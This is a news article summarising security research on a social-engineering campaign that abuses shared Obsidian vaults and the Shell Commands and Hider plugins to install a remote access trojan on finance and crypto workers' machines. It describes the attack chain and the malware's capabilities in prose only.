17.04.2026
4 min
200
Researchers have documented a new cyberattack in which attackers are using the popular note-taking app Obsidian as an entry point to infect systems. The campaign targets users in the financial and cryptocurrency sectors and allows the deployment of a previously unknown remote access trojan.
This research describes a brand-new social engineering scheme that hackers are utilizing to gain an entry into their victims’ systems. They’re doing this via the Obsidian note-taking application. Hackers specifically targeted individuals within the financial and cryptocurrency industries. Ultimately, the hackers were able to deploy a previously undocumented Windows Remote Access Trojan (RAT) named PHANTOMPULSE.
Elastic Security Labs refers to the campaign as REF6598. The campaign isn’t based on hacking or exploiting any technical flaws within Obsidian’s software. Rather than exploiting a vulnerability in Obsidian’s software, the attackers exploited trusting behavior of the users.
First, the attacker finds his/her target via LinkedIn. He/she sends a message to the target on behalf of a supposed Venture Capital Company. After some initial communication, the discussion is then moved over to Telegram where a group chat is initiated among multiple “parties” who will engage the victim regarding potential opportunities related to financial and cryptocurrency liquidity.
Given the nature of this type of group chat, the victim develops sufficient confidence in what is taking place. Therefore, he/she is then invited to collaborate on an Obsidian project by linking him/her to a shared Obsidian repository and providing login credentials to do so. This represents the critical juncture at which the attack is carried out.
As soon as the victim logs into the repository and clicks accept to synchronize installed community add-ons; however, this time malicious code is executed. Per the researchers, the attackers utilize legitimate Obsidian plug-ins – specifically Shell Commands and Hider.
Shell Commands allow them to run system-level commands, while Hider is used to hide UI elements that would otherwise alert the user to suspicious activity. It is essential to understand that Hider is deactivated by default, therefore the hacker must trick the victim into enabling it manually.
Again, according to the researchers, all malicious logic is contained within JSON configuration files. Thusly, traditional signature-based AV may be ineffective. Moreover, because the attack vector utilizes a legitimate Electron-based application, this provides additional challenges when attempting to identify/ detect the malware.
The Trojan has a number of functionalities.
It can execute a command on the computer it’s installed on
it can download and run files from remote sites
it takes screen shots
records keystrokes (the “keys you press”)
it increases its own privilege to SYSTEM using the COM elevation moniker so that other malicious processes can be started at SYSTEM privilege
it deletes evidence of itself being present on the machine
The approach on a macintosh is slightly different but the process is the same. On a Macintosh, instead of running a python or bash dropper, the attackers use an obfuscated AppleScript dropper which goes through a list of domains and then uses telegram as a backup to determine C2. This gives the attacker flexibility in their infrastructure and will make domain based blocking much harder.
At the end of this process, the script downloads what appears to be the second stage of the malware via osascript. What this second-stage does is still not known because the attacker controls were taken down by law enforcement and are no longer available.
Because of this, the attack failed to accomplish its intended objective. It was stopped and blocked by security systems while the attackers were still attempting to get into the system.
Elastic states that this incident represents a developing trend. Attackers have moved away from discovering and taking advantage of vulnerabilities and are now taking advantage of features built into legitimate applications. In this case, the attackers completely bypassed traditional protection mechanisms and forced the users to do everything themselves.
